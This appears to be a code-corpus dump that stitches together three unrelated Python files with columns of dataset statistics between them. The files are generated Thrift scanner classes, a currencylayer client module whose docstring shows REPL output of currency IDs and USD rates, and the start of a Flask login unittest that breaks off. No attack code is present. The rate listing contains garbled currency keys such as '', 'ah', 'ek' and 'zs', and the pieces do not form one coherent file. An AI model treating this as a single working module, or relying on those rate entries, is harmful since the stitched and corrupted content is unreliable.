oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.scannerId is None:
raise TProtocol.TProtocolException(message='Required field scannerId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getScannerRows_result:
"""
Attributes:
- success
- io
- ia: if the scannerId is invalid
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(TResult, TResult.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'ia', (TIllegalArgument, TIllegalArgument.thrift_spec), None, ), # 2
)
def __init__(self, success=None, io=None, ia=None,):
self.success = success
self.io = io
self.ia = ia
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype80, _size77) = iprot.readListBegin()
for _i81 in xrange(_size77):
_elem82 = TResult()
_elem82.read(iprot)
self.success.append(_elem82)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.ia = TIllegalArgument()
self.ia.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getScannerRows_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter83 in self.success:
iter83.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
if self.ia is not None:
oprot.writeFieldBegin('ia', TType.STRUCT, 2)
self.ia.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class closeScanner_args:
"""
Attributes:
- scannerId: the Id of the Scanner to close *
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'scannerId', None, None, ), # 1
)
def __init__(self, scannerId=None,):
self.scannerId = scannerId
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.scannerId = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('closeScanner_args')
if self.scannerId is not None:
oprot.writeFieldBegin('scannerId', TType.I32, 1)
oprot.writeI32(self.scannerId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.scannerId is None:
raise TProtocol.TProtocolException(message='Required field scannerId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class closeScanner_result:
"""
Attributes:
- io
- ia: if the scannerId is invalid
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'ia', (TIllegalArgument, TIllegalArgument.thrift_spec), None, ), # 2
)
def __init__(self, io=None, ia=None,):
self.io = io
self.ia = ia
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.ia = TIllegalArgument()
self.ia.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('closeScanner_result')
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
if self.ia is not None:
oprot.writeFieldBegin('ia', TType.STRUCT, 2)
self.ia.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 31.357048
| 188
| 0.658828
| 11,375
| 94,322
| 5.280527
| 0.028308
| 0.015483
| 0.027869
| 0.024873
| 0.902407
| 0.878667
| 0.870409
| 0.857707
| 0.848383
| 0.838411
| 0
| 0.005506
| 0.229809
| 94,322
| 3,007
| 189
| 31.367476
| 0.821325
| 0.093923
| 0
| 0.842946
| 1
| 0
| 0.035198
| 0.00075
| 0
| 0
| 0
| 0
| 0
| 1
| 0.110914
| false
| 0.005768
| 0.002662
| 0.028838
| 0.217835
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4063319c787e45fde05e1706897065720b502962
| 14,646
|
py
|
Python
|
jumpscale/clients/currencylayer/__init__.py
|
zaibon/js-sdk
|
cd1d26f2c3343884c1927ceef7c1e12e3f7da905
|
[
"Apache-2.0"
] | 13
|
2020-09-02T09:05:08.000Z
|
2022-03-12T02:43:24.000Z
|
jumpscale/clients/currencylayer/__init__.py
|
zaibon/js-sdk
|
cd1d26f2c3343884c1927ceef7c1e12e3f7da905
|
[
"Apache-2.0"
] | 1,998
|
2020-06-15T11:46:10.000Z
|
2022-03-24T22:12:41.000Z
|
jumpscale/clients/currencylayer/__init__.py
|
zaibon/js-sdk
|
cd1d26f2c3343884c1927ceef7c1e12e3f7da905
|
[
"Apache-2.0"
] | 8
|
2020-09-29T06:50:35.000Z
|
2021-06-14T03:30:52.000Z
|
"""
JS-NG> fake = j.clients.currencylayer.new('fake')
JS-NG> fake.cur2id_print()
{'aed': 1,
'afn': 2,
'all': 3,
'amd': 4,
'ang': 5,
'aoa': 6,
'ars': 7,
'aud': 8,
'awg': 9,
'azn': 10,
'bam': 11,
'bbd': 12,
'bdt': 13,
'bgn': 14,
'bhd': 15,
'bif': 16,
'bmd': 17,
'bnd': 18,
'bob': 19,
'brl': 20,
'bsd': 21,
'btc': 22,
'btn': 23,
'bwp': 24,
'byn': 25,
'byr': 26,
'bzd': 27,
'cad': 28,
'cdf': 29,
'chf': 30,
'clf': 31,
'clp': 32,
'cny': 33,
'cop': 34,
'crc': 35,
'cuc': 36,
'cup': 37,
'cve': 38,
'czk': 39,
'djf': 40,
'dkk': 41,
'dop': 42,
'dzd': 43,
'egp': 44,
'ern': 45,
'etb': 46,
'eth': 47,
'eur': 48,
'fjd': 49,
'fkp': 50,
'gbp': 51,
'gel': 52,
'ggp': 53,
'ghs': 54,
'gip': 55,
'gmd': 56,
'gnf': 57,
'gtq': 58,
'gyd': 59,
'hkd': 60,
'hnl': 61,
'hrk': 62,
'htg': 63,
'huf': 64,
'idr': 65,
'ils': 66,
'imp': 67,
'inr': 68,
'iqd': 69,
'irr': 70,
'isk': 71,
'jep': 72,
'jmd': 73,
'jod': 74,
'jpy': 75,
'kes': 76,
'kgs': 77,
'khr': 78,
'kmf': 79,
'kpw': 80,
'krw': 81,
'kwd': 82,
'kyd': 83,
'kzt': 84,
'lak': 85,
'lbp': 86,
'lkr': 87,
'lrd': 88,
'lsl': 89,
'ltl': 90,
'lvl': 91,
'lyd': 92,
'mad': 93,
'mdl': 94,
'mga': 95,
'mkd': 96,
'mmk': 97,
'mnt': 98,
'mop': 99,
'mro': 100,
'mur': 101,
'mvr': 102,
'mwk': 103,
'mxn': 104,
'myr': 105,
'mzn': 106,
'nad': 107,
'ngn': 108,
'nio': 109,
'nok': 110,
'npr': 111,
'nzd': 112,
'omr': 113,
'pab': 114,
'pen': 115,
'pgk': 116,
'php': 117,
'pkr': 118,
'pln': 119,
'pyg': 120,
'qar': 121,
'ron': 122,
'rsd': 123,
'rub': 124,
'rwf': 125,
'sar': 126,
'sbd': 127,
'scr': 128,
'sdg': 129,
'sek': 130,
'sgd': 131,
'shp': 132,
'sll': 133,
'sos': 134,
'srd': 135,
'std': 136,
'svc': 137,
'syp': 138,
'szl': 139,
'thb': 140,
'tjs': 141,
'tmt': 142,
'tnd': 143,
'top': 144,
'try': 145,
'ttd': 146,
'twd': 147,
'tzs': 148,
'uah': 149,
'ugx': 150,
'usd': 151,
'uyu': 152,
'uzs': 153,
'vef': 154,
'vnd': 155,
'vuv': 156,
'wst': 157,
'xaf': 158,
'xag': 159,
'xau': 160,
'xcd': 161,
'xdr': 162,
'xof': 163,
'xpf': 164,
'xrp': 165,
'yer': 166,
'zar': 167,
'zmk': 168,
'zmw': 169,
'zwl': 170}
JS-NG> fake.id2cur_print()
{1: 'aed',
2: 'afn',
3: 'all',
4: 'amd',
5: 'ang',
6: 'aoa',
7: 'ars',
8: 'aud',
9: 'awg',
10: 'azn',
11: 'bam',
12: 'bbd',
13: 'bdt',
14: 'bgn',
15: 'bhd',
16: 'bif',
17: 'bmd',
18: 'bnd',
19: 'bob',
20: 'brl',
21: 'bsd',
22: 'btc',
23: 'btn',
24: 'bwp',
25: 'byn',
26: 'byr',
27: 'bzd',
28: 'cad',
29: 'cdf',
30: 'chf',
31: 'clf',
32: 'clp',
33: 'cny',
34: 'cop',
35: 'crc',
36: 'cuc',
37: 'cup',
38: 'cve',
39: 'czk',
40: 'djf',
41: 'dkk',
42: 'dop',
43: 'dzd',
44: 'egp',
45: 'ern',
46: 'etb',
47: 'eth',
48: 'eur',
49: 'fjd',
50: 'fkp',
51: 'gbp',
52: 'gel',
53: 'ggp',
54: 'ghs',
55: 'gip',
56: 'gmd',
57: 'gnf',
58: 'gtq',
59: 'gyd',
60: 'hkd',
61: 'hnl',
62: 'hrk',
63: 'htg',
64: 'huf',
65: 'idr',
66: 'ils',
67: 'imp',
68: 'inr',
69: 'iqd',
70: 'irr',
71: 'isk',
72: 'jep',
73: 'jmd',
74: 'jod',
75: 'jpy',
76: 'kes',
77: 'kgs',
78: 'khr',
79: 'kmf',
80: 'kpw',
81: 'krw',
82: 'kwd',
83: 'kyd',
84: 'kzt',
85: 'lak',
86: 'lbp',
87: 'lkr',
88: 'lrd',
89: 'lsl',
90: 'ltl',
91: 'lvl',
92: 'lyd',
93: 'mad',
94: 'mdl',
95: 'mga',
96: 'mkd',
97: 'mmk',
98: 'mnt',
99: 'mop',
100: 'mro',
101: 'mur',
102: 'mvr',
103: 'mwk',
104: 'mxn',
105: 'myr',
106: 'mzn',
107: 'nad',
108: 'ngn',
109: 'nio',
110: 'nok',
111: 'npr',
112: 'nzd',
113: 'omr',
114: 'pab',
115: 'pen',
116: 'pgk',
117: 'php',
118: 'pkr',
119: 'pln',
120: 'pyg',
121: 'qar',
122: 'ron',
123: 'rsd',
124: 'rub',
125: 'rwf',
126: 'sar',
127: 'sbd',
128: 'scr',
129: 'sdg',
130: 'sek',
131: 'sgd',
132: 'shp',
133: 'sll',
134: 'sos',
135: 'srd',
136: 'std',
137: 'svc',
138: 'syp',
139: 'szl',
140: 'thb',
141: 'tjs',
142: 'tmt',
143: 'tnd',
144: 'top',
145: 'try',
146: 'ttd',
147: 'twd',
148: 'tzs',
149: 'uah',
150: 'ugx',
151: 'usd',
152: 'uyu',
153: 'uzs',
154: 'vef',
155: 'vnd',
156: 'vuv',
157: 'wst',
158: 'xaf',
159: 'xag',
160: 'xau',
161: 'xcd',
162: 'xdr',
163: 'xof',
164: 'xpf',
165: 'xrp',
166: 'yer',
167: 'zar',
168: 'zmk',
169: 'zmw',
170: 'zwl'}
JS-NG> fake.id2cur
{1: 'aed', 2: 'afn', 3: 'all', 4: 'amd', 5: 'ang', 6: 'aoa', 7: 'ars', 8: 'aud', 9: 'awg', 10: 'azn', 11: 'bam', 12: 'b
bd', 13: 'bdt', 14: 'bgn', 15: 'bhd', 16: 'bif', 17: 'bmd', 18: 'bnd', 19: 'bob', 20: 'brl', 21: 'bsd', 22: 'btc', 23:
'btn', 24: 'bwp', 25: 'byn', 26: 'byr', 27: 'bzd', 28: 'cad', 29: 'cdf', 30: 'chf', 31: 'clf', 32: 'clp', 33: 'cny', 34
: 'cop', 35: 'crc', 36: 'cuc', 37: 'cup', 38: 'cve', 39: 'czk', 40: 'djf', 41: 'dkk', 42: 'dop', 43: 'dzd', 44: 'egp',
45: 'ern', 46: 'etb', 47: 'eth', 48: 'eur', 49: 'fjd', 50: 'fkp', 51: 'gbp', 52: 'gel', 53: 'ggp', 54: 'ghs', 55: 'gip'
, 56: 'gmd', 57: 'gnf', 58: 'gtq', 59: 'gyd', 60: 'hkd', 61: 'hnl', 62: 'hrk', 63: 'htg', 64: 'huf', 65: 'idr', 66: 'ils', 67: 'imp', 68: 'inr', 69: 'iqd', 70: 'irr', 71: 'isk', 72: 'jep', 73: 'jmd', 74: 'jod', 75: 'jpy', 76: 'kes', 77: 'kgs', 78: 'khr', 79: 'kmf', 80: 'kpw', 81: 'krw', 82: 'kwd', 83: 'kyd', 84: 'kzt', 85: 'lak', 86: 'lbp', 87: 'lkr', 88: 'lrd', 89: 'lsl', 90: 'ltl', 91: 'lvl', 92: 'lyd', 93: 'mad', 94: 'mdl', 95: 'mga', 96: 'mkd', 97: 'mmk', 98: 'mnt', 99: 'mop', 100: 'mro', 101: 'mur', 102: 'mvr', 103: 'mwk', 104: 'mxn', 105: 'myr', 106: 'mzn', 107: 'nad', 108: 'ngn', 109: 'nio', 110: 'nok', 111: 'npr', 112: 'nzd', 113: 'omr', 114: 'pab', 115: 'pen', 116: 'pgk', 117: 'php', 118: 'pkr', 119: 'pln', 120: 'pyg', 121: 'qar', 122: 'ron', 123: 'rsd', 124: 'rub', 125: 'rwf', 126: 'sar', 127: 'sbd', 128: 'scr', 129: 'sdg', 130: 'sek', 131: 'sgd', 132: 'shp', 133: 'sll', 134: 'sos', 135: 'srd', 136: 'std', 137: 'svc', 138: 'syp', 139: 'szl', 140: 'thb', 141: 'tjs', 142: 'tmt', 143: 'tnd', 144: 'top', 145: 'try', 146: 'ttd', 147: 'twd', 148: 'tzs', 149: 'uah', 150: 'ugx', 151: 'usd', 152: 'uyu', 153: 'uzs', 154: 'vef', 155: 'vnd', 156: 'vuv', 157: 'wst', 158: 'xaf', 159: 'xag', 160: 'xau', 161: 'xcd', 162: 'xdr', 163: 'xof', 164: 'xpf', 165: 'xrp', 166: 'yer', 167: 'zar', 168: 'zmk', 169: 'zmw', 170: 'zwl'}
JS-NG> fake.cur2id
{'aed': 1, 'afn': 2, 'all': 3, 'amd': 4, 'ang': 5, 'aoa': 6, 'ars': 7, 'aud': 8, 'awg': 9, 'azn': 10, 'bam': 11, 'bbd':
12, 'bdt': 13, 'bgn': 14, 'bhd': 15, 'bif': 16, 'bmd': 17, 'bnd': 18, 'bob': 19, 'brl': 20, 'bsd': 21, 'btc': 22, 'btn
': 23, 'bwp': 24, 'byn': 25, 'byr': 26, 'bzd': 27, 'cad': 28, 'cdf': 29, 'chf': 30, 'clf': 31, 'clp': 32, 'cny': 33, 'c
op': 34, 'crc': 35, 'cuc': 36, 'cup': 37, 'cve': 38, 'czk': 39, 'djf': 40, 'dkk': 41, 'dop': 42, 'dzd': 43, 'egp': 44,
'ern': 45, 'etb': 46, 'eth': 47, 'eur': 48, 'fjd': 49, 'fkp': 50, 'gbp': 51, 'gel': 52, 'ggp': 53, 'ghs': 54, 'gip': 55
, 'gmd': 56, 'gnf': 57, 'gtq': 58, 'gyd': 59, 'hkd': 60, 'hnl': 61, 'hrk': 62, 'htg': 63, 'huf': 64, 'idr': 65, 'ils': 66, 'imp': 67, 'inr': 68, 'iqd': 69, 'irr': 70, 'isk': 71, 'jep': 72, 'jmd': 73, 'jod': 74, 'jpy': 75, 'kes': 76, 'kgs': 77, 'khr': 78, 'kmf': 79, 'kpw': 80, 'krw': 81, 'kwd': 82, 'kyd': 83, 'kzt': 84, 'lak': 85, 'lbp': 86, 'lkr': 87, 'lrd': 88, 'lsl': 89, 'ltl': 90, 'lvl': 91, 'lyd': 92, 'mad': 93, 'mdl': 94, 'mga': 95, 'mkd': 96, 'mmk': 97, 'mnt': 98, 'mop': 99, 'mro': 100, 'mur': 101, 'mvr': 102, 'mwk': 103, 'mxn': 104, 'myr': 105, 'mzn': 106, 'nad': 107, 'ngn': 108, 'nio': 109, 'nok': 110, 'npr': 111, 'nzd': 112, 'omr': 113, 'pab': 114, 'pen': 115, 'pgk': 116, 'php': 117, 'pkr': 118, 'pln': 119, 'pyg': 120, 'qar': 121, 'ron': 122, 'rsd': 123, 'rub': 124, 'rwf': 125, 'sar': 126, 'sbd': 127, 'scr': 128, 'sdg': 129, 'sek': 130, 'sgd': 131, 'shp': 132, 'sll': 133, 'sos': 134, 'srd': 135, 'std': 136, 'svc': 137, 'syp': 138, 'szl': 139, 'thb': 140, 'tjs': 141, 'tmt': 142, 'tnd': 143, 'top': 144, 'try': 145, 'ttd': 146, 'twd': 147, 'tzs': 148, 'uah': 149, 'ugx': 150, 'usd': 151, 'uyu': 152, 'uzs': 153, 'vef': 154, 'vnd': 155, 'vuv': 156, 'wst': 157, 'xaf': 158, 'xag': 159, 'xau': 160, 'xcd': 161, 'xdr': 162, 'xof': 163, 'xpf': 164, 'xrp': 165, 'yer': 166, 'zar': 167, 'zmk': 168, 'zmw': 169, 'zwl': 170}
JS-NG>
JS-NG> fake.api_key="VALID KEY"
JS-NG> j.clients.currencylayer.fake.load()
JS-NG> j.clients.currencylayer.fake.id2cur_print()
{1: 'aed',
2: 'afn',
3: 'all',
4: 'amd',
5: 'ang',
6: 'aoa',
7: 'ars',
8: 'aud',
9: 'awg',
10: 'azn',
11: 'bam',
12: 'bbd',
13: 'bdt',
14: 'bgn',
15: 'bhd',
16: 'bif',
17: 'bmd',
18: 'bnd',
19: 'bob',
20: 'brl',
21: 'bsd',
22: 'btc',
23: 'btn',
24: 'bwp',
25: 'byn',
26: 'byr',
27: 'bzd',
28: 'cad',
29: 'cdf',
30: 'chf',
31: 'clf',
32: 'clp',
33: 'cny',
34: 'cop',
35: 'crc',
36: 'cuc',
37: 'cup',
38: 'cve',
39: 'czk',
40: 'djf',
41: 'dkk',
42: 'dop',
43: 'dzd',
44: 'egp',
45: 'ern',
46: 'etb',
47: 'eth',
48: 'eur',
49: 'fjd',
50: 'fkp',
51: 'gbp',
52: 'gel',
53: 'ggp',
54: 'ghs',
55: 'gip',
56: 'gmd',
57: 'gnf',
58: 'gtq',
59: 'gyd',
60: 'hkd',
61: 'hnl',
62: 'hrk',
63: 'htg',
64: 'huf',
65: 'idr',
66: 'ils',
67: 'imp',
68: 'inr',
69: 'iqd',
70: 'irr',
71: 'isk',
72: 'jep',
73: 'jmd',
74: 'jod',
75: 'jpy',
76: 'kes',
77: 'kgs',
78: 'khr',
79: 'kmf',
80: 'kpw',
81: 'krw',
82: 'kwd',
83: 'kyd',
84: 'kzt',
85: 'lak',
86: 'lbp',
87: 'lkr',
88: 'lrd',
89: 'lsl',
90: 'ltl',
91: 'lvl',
92: 'lyd',
93: 'mad',
94: 'mdl',
95: 'mga',
96: 'mkd',
97: 'mmk',
98: 'mnt',
99: 'mop',
100: 'mro',
101: 'mur',
102: 'mvr',
103: 'mwk',
104: 'mxn',
105: 'myr',
106: 'mzn',
107: 'nad',
108: 'ngn',
109: 'nio',
110: 'nok',
111: 'npr',
112: 'nzd',
113: 'omr',
114: 'pab',
115: 'pen',
116: 'pgk',
117: 'php',
118: 'pkr',
119: 'pln',
120: 'pyg',
121: 'qar',
122: 'ron',
123: 'rsd',
124: 'rub',
125: 'rwf',
126: 'sar',
127: 'sbd',
128: 'scr',
129: 'sdg',
130: 'sek',
131: 'sgd',
132: 'shp',
133: 'sll',
134: 'sos',
135: 'srd',
136: 'std',
137: 'svc',
138: 'syp',
139: 'szl',
140: 'thb',
141: 'tjs',
142: 'tmt',
143: 'tnd',
144: 'top',
145: 'try',
146: 'ttd',
147: 'twd',
148: 'tzs',
149: 'uah',
150: 'ugx',
151: 'usd',
152: 'uyu',
153: 'uzs',
154: 'vef',
155: 'vnd',
156: 'vuv',
157: 'wst',
158: 'xaf',
159: 'xag',
160: 'xau',
161: 'xcd',
162: 'xdr',
163: 'xof',
164: 'xpf',
165: 'xrp',
166: 'yer',
167: 'zar',
168: 'zmk',
169: 'zmw',
170: 'zwl'}
JS-NG> j.clients.currencylayer.fake.cur2usd_print()
{'': 1,
'aed': 3.672979,
'afn': 78.296617,
'ah': 24.914996,
'all': 109.150047,
'amd': 476.210221,
'ang': 1.78525,
'aoa': 362.0025,
'ar': 3.75045,
'ars': 55.394992,
'aud': 1.474703,
'awg': 1.8,
'azn': 1.704964,
'bam': 1.758993,
'bbd': 2.0194,
'bd': 8.221403,
'bdt': 83.745499,
'bgn': 1.760801,
'bhd': 0.375961,
'bif': 1855,
'bmd': 1,
'bnd': 1.350696,
'bob': 6.86065,
'brl': 4.152695,
'bsd': 0.99205,
'btc': 9.948852946999476e-05,
'btn': 71.884502,
'bwp': 10.961999,
'byn': 2.060501,
'byr': 19600,
'bzd': 2.01595,
'cad': 1.32733,
'cdf': 1659.99946,
'chf': 0.978545,
'clf': 0.026094,
'clp': 720.00501,
'cny': 7.151304,
'cop': 3431.55,
'cr': 13.669974,
'crc': 567.080062,
'cuc': 1,
'cup': 26.5,
'cve': 98.749501,
'czk': 23.208988,
'egp': 16.53602,
'ek': 9.67235,
'ern': 14.999484,
'etb': 29.000284,
'eth': 0.005395489370885939,
'eur': 0.900035,
'fjd': 2.17495,
'fkp': 0.81691,
'g': 45.119039,
'gbp': 0.81752,
'gd': 1.38792,
'gel': 2.925034,
'ggp': 0.81764,
'ghs': 5.402501,
'gip': 0.81691,
'gmd': 50.415037,
'gnf': 9239.999966,
'gtq': 7.680957,
'gx': 3685.496424,
'gyd': 209.244968,
'hkd': 7.84595,
'hnl': 24.674984,
'hp': 1.320898,
'hrk': 6.653399,
'htg': 95.361503,
'huf': 296.280997,
'idr': 14258.25,
'ils': 3.52095,
'imp': 0.81764,
'inr': 71.792403,
'iqd': 1190,
'irr': 42104.999481,
'isk': 124.829491,
'jep': 0.81764,
'jf': 177.720165,
'jmd': 134.559965,
'jod': 0.7084,
'jpy': 106.015996,
'kes': 103.389937,
'kgs': 69.8159,
'khr': 4140.000279,
'kk': 6.71151,
'kmf': 443.249767,
'kpw': 900.052015,
'krw': 1214.824979,
'kwd': 0.303901,
'kyd': 0.83355,
'kzt': 383.110385,
'lak': 8735.000017,
'lbp': 1507.949729,
'lkr': 179.605474,
'll': 9299.999946,
'lrd': 205.000232,
'lsl': 15.250149,
'ltl': 2.95274,
'lvl': 0.60489,
'lyd': 1.40503,
'mad': 9.5685,
'mdl': 17.887498,
'mga': 3674.999563,
'mkd': 55.324023,
'mmk': 1516.702673,
'mnt': 2669.391245,
'mop': 8.080496,
'mro': 357.000024,
'mur': 36.043506,
'mvr': 15.410297,
'mwk': 731.210149,
'mxn': 19.92145,
'myr': 4.198897,
'mzn': 61.020166,
'nad': 15.270055,
'ngn': 362.000148,
'nio': 33.602406,
'nok': 8.988065,
'npr': 115.010199,
'nzd': 1.56365,
'omr': 0.384976,
'op': 51.294983,
'os': 579.999893,
'pab': 0.99205,
'pen': 3.37635,
'pgk': 3.397801,
'php': 52.438012,
'pkr': 157.249855,
'pln': 3.92254,
'pyg': 6217.103241,
'qar': 3.64175,
'rd': 7.457963,
'ron': 4.256202,
'rsd': 106.069758,
'rub': 66.06102,
'rwf': 910,
'td': 21560.79,
'thb': 30.589849,
'tjs': 9.696302,
'tmt': 3.5,
'tnd': 2.857701,
'top': 2.320597,
'try': 5.81132,
'ttd': 6.71695,
'twd': 31.400972,
'tzs': 2298.149889,
'vc': 8.75195,
'vef': 9.987501,
'vnd': 23199,
'vuv': 117.90362,
'wst': 2.675215,
'xaf': 589.959986,
'xag': 0.056555,
'xau': 0.000653,
'xcd': 2.70245,
'xdr': 0.729108,
'xof': 584.499865,
'xpf': 106.950279,
'xrp': 3.771,
'yer': 250.349819,
'yp': 515.000236,
'yu': 36.34003,
'zar': 15.26498,
'zd': 119.879946,
'zl': 15.269489,
'zmk': 9001.202171,
'zmw': 13.112024,
'zs': 9376.306597,
'zwl': 322.000001}
"""
def export_module_as():
from jumpscale.core.base import StoredFactory
from .currencylayer import CurrencyLayerClient
return StoredFactory(CurrencyLayerClient)
| 20.455307
| 1,337
| 0.457053
| 2,279
| 14,646
| 2.934182
| 0.258447
| 0.005982
| 0.007178
| 0.003589
| 0.701062
| 0.701062
| 0.689248
| 0.689248
| 0.689248
| 0.689248
| 0
| 0.297685
| 0.247918
| 14,646
| 715
| 1,338
| 20.483916
| 0.309396
| 0.987369
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
40bebeabbf79ea9774e5c3dca1d8cd3ac6772646
| 2,712
|
py
|
Python
|
test/v1/test_users.py
|
SelaDanti/store-manager-api
|
3d3a26ebf961ddb2c97f0d31c48ae07b43201b4f
|
[
"MIT"
] | 1
|
2018-10-18T12:40:19.000Z
|
2018-10-18T12:40:19.000Z
|
test/v1/test_users.py
|
SelaDanti/store-manager-api
|
3d3a26ebf961ddb2c97f0d31c48ae07b43201b4f
|
[
"MIT"
] | 5
|
2018-10-23T11:08:56.000Z
|
2019-10-21T15:58:54.000Z
|
test/v1/test_users.py
|
SelaDanti/store-manager-api
|
3d3a26ebf961ddb2c97f0d31c48ae07b43201b4f
|
[
"MIT"
] | 1
|
2018-10-18T13:37:35.000Z
|
2018-10-18T13:37:35.000Z
|
import unittest
import json
from app import create_app
class TestInvalidData(unittest.TestCase):
def setUp(self):
self.test = create_app('testing').test_client()
self.content_type = 'application/json'
def tearDown(self):
self.test = None
self.content_type = None
def test_not_emailI(self):
payload = {'role': 'admin', 'password': '1234', 'email': 'stringgmail.com'}
response = self.test.post('/api/v1/users/login',content_type=self.content_type,
data=json.dumps(payload))
data =json.loads(response.get_data().decode('UTF-8'))
self.assertEqual(response.status_code,406)
self.assertEqual(data,{'result': 'invalid email'})
def test_not_role(self):
payload = {'role': 'not role', 'password': '1234', 'email': 'string@gmail.com'}
response = self.test.post('/api/v1/users/login',content_type=self.content_type,
data=json.dumps(payload))
data =json.loads(response.get_data().decode('UTF-8'))
self.assertEqual(response.status_code,406)
self.assertEqual(data,{'result': 'invalid role'})
def test_invalid_login(self):
payload = {'role': 'admin', 'password': 'notpassword', 'email': 'not@gmail.com'}
response = self.test.post('/api/v1/users/login',content_type=self.content_type,
data=json.dumps(payload))
data =json.loads(response.get_data().decode('UTF-8'))
self.assertEqual(response.status_code,406)
self.assertEqual(data,{'result': 'email or password invalid'})
class TestValidData(unittest.TestCase):
def setUp(self):
self.test = create_app('testing').test_client()
self.content_type = 'application/json'
payload = {'role': 'admin', 'password': '1234', 'email': 'admin@gmail.com'}
response = self.test.post('/api/v1/users/login',content_type=self.content_type,
data=json.dumps(payload))
data =json.loads(response.get_data().decode('UTF-8'))
token = data['result']
